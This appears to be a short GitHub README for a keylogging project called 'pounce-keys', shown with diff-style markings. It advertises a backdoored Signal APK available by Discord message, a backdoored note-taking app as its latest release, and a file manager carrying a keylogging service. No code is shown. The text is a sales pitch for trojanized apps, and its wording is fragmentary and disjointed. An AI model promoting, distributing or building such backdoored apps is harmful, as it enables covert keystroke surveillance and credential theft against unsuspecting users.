NullPounce/pounce-keys/README.md

 ![gmail](https://img.shields.io/github/downloads/nullpounce/pounce-keys/Pounce-Keys-Gmail/total?color=purple&label=Gmail-Downloads)
 ![discord](https://img.shields.io/github/downloads/nullpounce/pounce-keys/Pounce-Keys-Discord/total?color=purple&label=Discord-Downloads)

+-------[2024] SIGNAL BACKDOOR!!-------------

+I have the latest Signal APK with pounce keys in it "Contact me for info" dm me on discord or check socials on my website"

+ latest release is a backdoored note taking app

 2024 File Manager with a keylogging service "ok I see it's a notes app sorry"

 NEW UPDATE! check the issues page and the new release section, new update